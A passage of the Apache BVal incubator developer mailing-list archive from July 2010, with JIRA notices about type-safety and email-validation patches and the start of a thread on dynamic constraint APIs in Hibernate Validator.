Reporter: Matt Benson Attachments: BVAL-79.patch.txt jsr303 + core -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Fri Jul 09 19:44:45 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 92471 invoked from network); 9 Jul 2010 19:44:44 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 9 Jul 2010 19:44:44 -0000 Received: (qmail 28877 invoked by uid 500); 9 Jul 2010 19:44:44 -0000 Delivered-To: [email protected] Received: (qmail 28786 invoked by uid 500); 9 Jul 2010 19:44:44 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 28777 invoked by uid 99); 9 Jul 2010 19:44:44 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 09 Jul 2010 19:44:44 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO thor.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 09 Jul 2010 19:44:42 +0000 Received: from thor (localhost [161.129.204.104]) by thor.apache.org (8.13.8+Sun/8.13.8) with ESMTP id o69JapYD007747 for <[email protected]>; Fri, 9 Jul 2010 19:36:51 GMT Message-ID: <9456299.291621278704211128.JavaMail.jira@thor> Date: Fri, 9 Jul 2010 15:36:51 -0400 (EDT) From: "Matt Benson (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Updated: (BVAL-79) email validation can easily work for any CharSequence rather than String only In-Reply-To: <16562991.291571278704209592.JavaMail.jira@thor> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/BVAL-79?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Matt Benson updated BVAL-79: ---------------------------- Attachment: BVAL-79.patch.txt > email validation can easily work for any CharSequence rather than String only > ----------------------------------------------------------------------------- > > Key: BVAL-79 > URL: https://issues.apache.org/jira/browse/BVAL-79 > Project: BeanValidation > Issue Type: Improvement > Components: jsr303 > Affects Versions: 0.2-incubating > Reporter: Matt Benson > Attachments: BVAL-79.patch.txt > > > jsr303 + core -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Sat Jul 10 16:09:15 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 70593 invoked from network); 10 Jul 2010 16:09:14 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 10 Jul 2010 16:09:14 -0000 Received: (qmail 9926 invoked by uid 500); 10 Jul 2010 16:09:14 -0000 Delivered-To: [email protected] Received: (qmail 9888 invoked by uid 500); 10 Jul 2010 16:09:14 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 9880 invoked by uid 99); 10 Jul 2010 16:09:14 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 10 Jul 2010 16:09:14 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO thor.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 10 Jul 2010 16:09:11 +0000 Received: from thor (localhost [161.129.204.104]) by thor.apache.org (8.13.8+Sun/8.13.8) with ESMTP id o6AG8oxC015784 for <[email protected]>; Sat, 10 Jul 2010 16:08:50 GMT Message-ID: <20240253.305041278778130075.JavaMail.jira@thor> Date: Sat, 10 Jul 2010 12:08:50 -0400 (EDT) From: "Carlos Vara (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Assigned: (BVAL-78) Avoid unsafe casting and object swapping when processing @ReportAsSingleViolation composed constraints In-Reply-To: <10904718.289781278701091136.JavaMail.jira@thor> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/BVAL-78?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Carlos Vara reassigned BVAL-78: ------------------------------- Assignee: Carlos Vara > Avoid unsafe casting and object swapping when processing @ReportAsSingleViolation composed constraints > ------------------------------------------------------------------------------------------------------ > > Key: BVAL-78 > URL: https://issues.apache.org/jira/browse/BVAL-78 > Project: BeanValidation > Issue Type: Improvement > Components: jsr303 > Affects Versions: 0.2-incubating > Reporter: Matt Benson > Assignee: Carlos Vara > Attachments: BVAL-78.patch.txt > > > Numerous warnings abound in ConstraintViolation due to the fact that ConstraintValidationListener must be used as a raw type. Further the GroupValidationContext must be cast to a BeanValidationContext so that the listener reference can be reset, which doesn't feel optimal either. The attached patch: > * Modifies GroupValidationContext<T> such that, rather than extending ValidationContext<T> where T extends ValidationListener, it instead expressly implements ValidationContext<ConstraintValidationListener<T>> (T is now effectively the same type variable as ConstraintValidationListener<T>). Now GroupValidationContext.getListener() expressly returns a ConstraintValidationListener. > * Adds state management for @ReportAsSingleViolation composed constraints to ConstraintValidationListener so that the original listener instance can be used throughout. > * The reportAsSingle execution path bails as soon as it is known that a composing constraint has failed. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Sat Jul 10 16:26:47 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 72556 invoked from network); 10 Jul 2010 16:26:46 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 10 Jul 2010 16:26:46 -0000 Received: (qmail 16562 invoked by uid 500); 10 Jul 2010 16:26:46 -0000 Delivered-To: [email protected] Received: (qmail 16524 invoked by uid 500); 10 Jul 2010 16:26:46 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 16511 invoked by uid 99); 10 Jul 2010 16:26:46 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 10 Jul 2010 16:26:46 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO thor.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 10 Jul 2010 16:26:43 +0000 Received: from thor (localhost [161.129.204.104]) by thor.apache.org (8.13.8+Sun/8.13.8) with ESMTP id o6AGIqMU015824 for <[email protected]>; Sat, 10 Jul 2010 16:18:52 GMT Message-ID: <8414365.305121278778732518.JavaMail.jira@thor> Date: Sat, 10 Jul 2010 12:18:52 -0400 (EDT) From: "Carlos Vara (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Resolved: (BVAL-78) Avoid unsafe casting and object swapping when processing @ReportAsSingleViolation composed constraints In-Reply-To: <10904718.289781278701091136.JavaMail.jira@thor> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/BVAL-78?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Carlos Vara resolved BVAL-78. ----------------------------- Fix Version/s: 0.2-incubating Resolution: Fixed Merged the patch, thanks Matt! I added a commentary regarding the use of an AtomicInteger in ConstraintValidationListener, since it should not be needed as objects of that class (and all the classes involved in the validation process) are never shared between threads. > Avoid unsafe casting and object swapping when processing @ReportAsSingleViolation composed constraints > ------------------------------------------------------------------------------------------------------ > > Key: BVAL-78 > URL: https://issues.apache.org/jira/browse/BVAL-78 > Project: BeanValidation > Issue Type: Improvement > Components: jsr303 > Affects Versions: 0.2-incubating > Reporter: Matt Benson > Assignee: Carlos Vara > Fix For: 0.2-incubating > > Attachments: BVAL-78.patch.txt > > > Numerous warnings abound in ConstraintViolation due to the fact that ConstraintValidationListener must be used as a raw type. Further the GroupValidationContext must be cast to a BeanValidationContext so that the listener reference can be reset, which doesn't feel optimal either. The attached patch: > * Modifies GroupValidationContext<T> such that, rather than extending ValidationContext<T> where T extends ValidationListener, it instead expressly implements ValidationContext<ConstraintValidationListener<T>> (T is now effectively the same type variable as ConstraintValidationListener<T>). Now GroupValidationContext.getListener() expressly returns a ConstraintValidationListener. > * Adds state management for @ReportAsSingleViolation composed constraints to ConstraintValidationListener so that the original listener instance can be used throughout. > * The reportAsSingle execution path bails as soon as it is known that a composing constraint has failed. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Sat Jul 10 16:37:44 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 73383 invoked from network); 10 Jul 2010 16:37:44 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 10 Jul 2010 16:37:44 -0000 Received: (qmail 19628 invoked by uid 500); 10 Jul 2010 16:37:44 -0000 Delivered-To: [email protected] Received: (qmail 19592 invoked by uid 500); 10 Jul 2010 16:37:44 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 19584 invoked by uid 99); 10 Jul 2010 16:37:44 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 10 Jul 2010 16:37:44 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO thor.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 10 Jul 2010 16:37:41 +0000 Received: from thor (localhost [161.129.204.104]) by thor.apache.org (8.13.8+Sun/8.13.8) with ESMTP id o6AGTnZV015877 for <[email protected]>; Sat, 10 Jul 2010 16:29:50 GMT Message-ID: <20841908.305201278779389821.JavaMail.jira@thor> Date: Sat, 10 Jul 2010 12:29:49 -0400 (EDT) From: "Carlos Vara (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Assigned: (BVAL-79) email validation can easily work for any CharSequence rather than String only In-Reply-To: <16562991.291571278704209592.JavaMail.jira@thor> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/BVAL-79?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Carlos Vara reassigned BVAL-79: ------------------------------- Assignee: Carlos Vara > email validation can easily work for any CharSequence rather than String only > ----------------------------------------------------------------------------- > > Key: BVAL-79 > URL: https://issues.apache.org/jira/browse/BVAL-79 > Project: BeanValidation > Issue Type: Improvement > Components: jsr303 > Affects Versions: 0.2-incubating > Reporter: Matt Benson > Assignee: Carlos Vara > Attachments: BVAL-79.patch.txt > > > jsr303 + core -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Sat Jul 10 16:38:14 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 73448 invoked from network); 10 Jul 2010 16:38:14 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 10 Jul 2010 16:38:14 -0000 Received: (qmail 19721 invoked by uid 500); 10 Jul 2010 16:38:14 -0000 Delivered-To: [email protected] Received: (qmail 19689 invoked by uid 500); 10 Jul 2010 16:38:14 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 19679 invoked by uid 99); 10 Jul 2010 16:38:14 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 10 Jul 2010 16:38:14 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO thor.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 10 Jul 2010 16:38:11 +0000 Received: from thor (localhost [161.129.204.104]) by thor.apache.org (8.13.8+Sun/8.13.8) with ESMTP id o6AGbojs015892 for <[email protected]>; Sat, 10 Jul 2010 16:37:50 GMT Message-ID: <6849185.305231278779870000.JavaMail.jira@thor> Date: Sat, 10 Jul 2010 12:37:49 -0400 (EDT) From: "Carlos Vara (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Resolved: (BVAL-79) email validation can easily work for any CharSequence rather than String only In-Reply-To: <16562991.291571278704209592.JavaMail.jira@thor> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/BVAL-79?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Carlos Vara resolved BVAL-79. ----------------------------- Fix Version/s: 0.2-incubating Resolution: Fixed Merged in rev 962879, thanks again Matt. > email validation can easily work for any CharSequence rather than String only > ----------------------------------------------------------------------------- > > Key: BVAL-79 > URL: https://issues.apache.org/jira/browse/BVAL-79 > Project: BeanValidation > Issue Type: Improvement > Components: jsr303 > Affects Versions: 0.2-incubating > Reporter: Matt Benson > Assignee: Carlos Vara > Fix For: 0.2-incubating > > Attachments: BVAL-79.patch.txt > > > jsr303 + core -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Sat Jul 10 16:42:14 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 74020 invoked from network); 10 Jul 2010 16:42:14 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 10 Jul 2010 16:42:14 -0000 Received: (qmail 22078 invoked by uid 500); 10 Jul 2010 16:42:14 -0000 Delivered-To: [email protected] Received: (qmail 22043 invoked by uid 500); 10 Jul 2010 16:42:14 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 22035 invoked by uid 99); 10 Jul 2010 16:42:14 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 10 Jul 2010 16:42:14 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO thor.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 10 Jul 2010 16:42:11 +0000 Received: from thor (localhost [161.129.204.104]) by thor.apache.org (8.13.8+Sun/8.13.8) with ESMTP id o6AGfn70015914 for <[email protected]>; Sat, 10 Jul 2010 16:41:49 GMT Message-ID: <30629476.305271278780109560.JavaMail.jira@thor> Date: Sat, 10 Jul 2010 12:41:49 -0400 (EDT) From: "Carlos Vara (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Assigned: (BVAL-73) Alternative way of addressing code reuse issue between the validators In-Reply-To: <2619631.132761277902969369.JavaMail.jira@thor> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/BVAL-73?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Carlos Vara reassigned BVAL-73: ------------------------------- Assignee: Carlos Vara > Alternative way of addressing code reuse issue between the validators > --------------------------------------------------------------------- > > Key: BVAL-73 > URL: https://issues.apache.org/jira/browse/BVAL-73 > Project: BeanValidation > Issue Type: Improvement > Affects Versions: 0.2-incubating > Reporter: Carlos Vara > Assignee: Carlos Vara > Priority: Minor > Attachments: ValidationHelper.diff > > > Currently, the code reuse issue exposed in BVAL-47 has been solved using a common abstract validator which is subclassed by the jsr303 and core validators. > I have been thinking about how to solve the type safety problems I exposed in my mail. I propose a different solution (no inheritance, and a strategy pattern is used to return the validation flow to the correct method in each validator in a type safe way). The reasons why I propose removing the current inheritance scheme are: > - Inheritance is just used for code reuse. The 2 validatos have different interfaces to which they respond to, and there is no code in which a reference to an "abstract" validator is or should be held. > - I haven't found a way of removing class casting issues with the inheritance strategy. I know that at the moment it is somewhat "easy" to see that most of the casts can't fail, but I find it cleaner and safer to code it in a way in which type safety is enforced by the compiler. > Please take into account that the proposed diff is a preliminar work that simply shows a way in which this could be done. If you prefer this to the current solution with inheritance, further work would be done to better ensure type safety, access to the property treatsMapsLikeBeans would be centralized, etc. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Sat Jul 10 19:15:44 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 14189 invoked from network); 10 Jul 2010 19:15:44 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 10 Jul 2010 19:15:44 -0000 Received: (qmail 95004 invoked by uid 500); 10 Jul 2010 19:15:44 -0000 Delivered-To: [email protected] Received: (qmail 94957 invoked by uid 500); 10 Jul 2010 19:15:43 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 94949 invoked by uid 99); 10 Jul 2010 19:15:43 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 10 Jul 2010 19:15:43 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO thor.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 10 Jul 2010 19:15:41 +0000 Received: from thor (localhost [161.129.204.104]) by thor.apache.org (8.13.8+Sun/8.13.8) with ESMTP id o6AJ7nwx016956 for <[email protected]>; Sat, 10 Jul 2010 19:07:50 GMT Message-ID: <16902652.307201278788869764.JavaMail.jira@thor> Date: Sat, 10 Jul 2010 15:07:49 -0400 (EDT) From: "Carlos Vara (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Resolved: (BVAL-73) Alternative way of addressing code reuse issue between the validators In-Reply-To: <2619631.132761277902969369.JavaMail.jira@thor> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/BVAL-73?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Carlos Vara resolved BVAL-73. ----------------------------- Fix Version/s: 0.2-incubating Resolution: Fixed As there is no opposition, I merged a slightly modified version of the patch in rev 962902. > Alternative way of addressing code reuse issue between the validators > --------------------------------------------------------------------- > > Key: BVAL-73 > URL: https://issues.apache.org/jira/browse/BVAL-73 > Project: BeanValidation > Issue Type: Improvement > Affects Versions: 0.2-incubating > Reporter: Carlos Vara > Assignee: Carlos Vara > Priority: Minor > Fix For: 0.2-incubating > > Attachments: ValidationHelper.diff > > > Currently, the code reuse issue exposed in BVAL-47 has been solved using a common abstract validator which is subclassed by the jsr303 and core validators. > I have been thinking about how to solve the type safety problems I exposed in my mail. I propose a different solution (no inheritance, and a strategy pattern is used to return the validation flow to the correct method in each validator in a type safe way). The reasons why I propose removing the current inheritance scheme are: > - Inheritance is just used for code reuse. The 2 validatos have different interfaces to which they respond to, and there is no code in which a reference to an "abstract" validator is or should be held. > - I haven't found a way of removing class casting issues with the inheritance strategy. I know that at the moment it is somewhat "easy" to see that most of the casts can't fail, but I find it cleaner and safer to code it in a way in which type safety is enforced by the compiler. > Please take into account that the proposed diff is a preliminar work that simply shows a way in which this could be done. If you prefer this to the current solution with inheritance, further work would be done to better ensure type safety, access to the property treatsMapsLikeBeans would be centralized, etc. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Mon Jul 12 16:35:41 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 26419 invoked from network); 12 Jul 2010 16:35:41 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 12 Jul 2010 16:35:41 -0000 Received: (qmail 59202 invoked by uid 500); 12 Jul 2010 16:35:41 -0000 Delivered-To: [email protected] Received: (qmail 59163 invoked by uid 500); 12 Jul 2010 16:35:40 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 59155 invoked by uid 99); 12 Jul 2010 16:35:40 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 12 Jul 2010 16:35:40 +0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=FREEMAIL_FROM,RCVD_IN_DNSWL_NONE,SPF_PASS,T_TO_NO_BRKTS_FREEMAIL X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-qy0-f182.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 12 Jul 2010 16:35:31 +0000 Received: by qyk7 with SMTP id 7so5312133qyk.6 for <[email protected]>; Mon, 12 Jul 2010 09:34:11 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:received:received:from:content-type :content-transfer-encoding:subject:date:message-id:to:mime-version :x-mailer; bh=UWYh/555LJlwelzmDzoMPzeqVnkB8WTLi3Lv0f+JLM8=; b=uctt4kNDXBBEbk5qoquHi74Ker6znD08uFsCPKdoYZN9GhVzd+vkOGs4UouAXoWLrt sxHH23QKg8KjOyOu/8eNY2hRAkoQemIRb/BTidVQNyIeY/BkEWObUPPTs3KO7EGib5t5 09fzG1bq4m/LdfliwH71Kn9b9HD0vdTHQxf8M= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=from:content-type:content-transfer-encoding:subject:date:message-id :to:mime-version:x-mailer; b=fzUl945fpfxa6lidkAtnC1sQYQAanjeCjYoQAjQ/EKx5VcWd8dMnqNnb3zHbV2TpS5 LOTGlbVaTNc6gzKzGsRntCpDSsYlfgBYdbIfgxh9XqSCGdghy70I/yuLtrxIiWQX7Z7q 7jxYqWmMNi1b/ItEQccpTKEiv0IMh69g7owk0= Received: by 161.129.204.104 with SMTP id b17mr7278157qal.62.1278952450842; Mon, 12 Jul 2010 09:34:10 -0700 (PDT) Received: from [161.129.204.104] ([161.129.204.104]) by mx.google.com with ESMTPS id js14sm20316534qcb.6.2161.129.204.104.34.05 (version=TLSv1/SSLv3 cipher=RC4-MD5); Mon, 12 Jul 2010 09:34:09 -0700 (PDT) From: Matt Benson <[email protected]> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: quoted-printable Subject: Dynamic constraints Date: Mon, 12 Jul 2010 11:33:53 -0500 Message-Id: <[email protected]> To: [email protected] Mime-Version: 1.0 (Apple Message framework v1081) X-Mailer: Apple Mail (2.1081) X-Virus-Checked: Checked by ClamAV on apache.org A colleague just sent over a link to a blog about the Hibernate = Validator 4.1.0 release: = http://musingsofaprogrammingaddict.blogspot.com/2010/06/whats-new-in-hiber= nate-validator-41.html In particular, they now offer a dynamic API. Does anyone have any = thoughts on the API they've created? IMO if they have dynamic = constraints, and bval has dynamic constraints, eventually the spec will = have dynamic constraints. I personally don't think that dynamic = constraints are that powerful unless you have ways of "branching" = constraint mappings from globally-applicable down to instance-level (and = possibly steps in between). I'm also not thrilled with their fluent = builders: they seem nice to use at compile-time, but the fact that they = would require a different builder per constraint type to be written or = generated seems less than optimal. I am wondering if we could borrow = some ideas from e.g. Mockito to stay typesafe and compiler-checked yet = avoid the need to write a builder per constraint. Thoughts? -Matt= From [email protected] Mon Jul 12 17:29:08 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 53021 invoked from network); 12 Jul 2010 17:29:07 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 12 Jul 2010 17:29:07 -0000 Received: (qmail 51092 invoked by uid 500); 12 Jul 2010 17:29:07 -0000 Delivered-To: [email protected] Received: (qmail 51058 invoked by uid 500); 12 Jul 2010 17:29:07 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 51050 invoked by uid 99); 12 Jul 2010 17:29:07 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 12 Jul 2010 17:29:07 +0000 X-ASF-Spam-Status: No, hits=2.2 required=10.0 tests=FREEMAIL_FROM,HTML_MESSAGE,SPF_PASS,T_TO_NO_BRKTS_FREEMAIL X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-iw0-f175.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 12 Jul 2010 17:29:00 +0000 Received: by iwn34 with SMTP id 34so4950323iwn.6 for <[email protected]>; Mon, 12 Jul 2010 10:27:39 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:received:mime-version:received:in-reply-to :references:from:date:message-id:subject:to:content-type; bh=ylwqxIXD6v6qzA+sTLQyunQEwc7EI5l3fFe3KnHQjCI=; b=sxeJK/Xj96+PgVgFoaNDYMa/gmhegjZAAcrURYcGO/n6lAeMPonu1aN8OjTUTePZjC Iv7ez6TiOl44vZCMi8+Vql4AZQNv6t80amXBWwnWdiCyQFNzNXYBaJKY6pXI2aRhUiEC gkTJXSKNiIjaxGWMiucWhpovDYVs9D6/D6J0s= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:from:date:message-id:subject:to :content-type; b=gawq2u6XW0bEOXmCccuDpjNacfy43f6YcwfFiwT+ZkY+4xbcrVPZVX6fjkTU5tSDhX tuVWTC0v8vDZ/yZAuu5zmVS0/YhYoYeXk8jNdZe6ru89WhniznM5b0kWblVxuE7pet62 oiW1nF3ziMJzSXNTlMi7S0kKvMIvpabfEt5sc= Received: by 161.129.204.104 with SMTP id d7mr14869391iba.167.1278955656719; Mon, 12 Jul 2010 10:27:36 -0700 (PDT) MIME-Version: 1.0 Received: by 161.129.204.104 with HTTP; Mon, 12 Jul 2010 10:27:16 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> From: Gerhard Petracek <[email protected]> Date: Mon, 12 Jul 2010 19:27:16 +0200 Message-ID: <[email protected]> Subject: Re: Dynamic constraints To: [email protected] Content-Type: multipart/alternative; boundary=00235452eebc9a367d048b341183 X-Virus-Checked: Checked by ClamAV on apache.org --00235452eebc9a367d048b341183 Content-Type: text/plain; charset=ISO-8859-1 hi matt, if you have some interesting ideas we can prototype them. as soon as we have a nice solution, i'll discuss it in the eg. regards, gerhard http://www.irian.at Your JSF powerhouse - JSF Consulting, Development and Courses in English and German Professional Support for Apache MyFaces 2010/7/12 Matt Benson <[email protected]> > A colleague just sent over a link to a blog about the Hibernate Validator > 4.1.0 release: > > > http://musingsofaprogrammingaddict.blogspot.com/2010/06/whats-new-in-hibernate-validator-41.html > > In particular, they now offer a dynamic API. Does anyone have any thoughts > on the API they've created? IMO if they have dynamic constraints, and bval > has dynamic constraints, eventually the spec will have dynamic constraints. > I personally don't think that dynamic constraints are that powerful unless > you have ways of "branching" constraint mappings from globally-applicable > down to instance-level (and possibly steps in between). I'm also not > thrilled with their fluent builders: they seem nice to use at compile-time, > but the fact that they would require a different builder per constraint type > to be written or generated seems less than 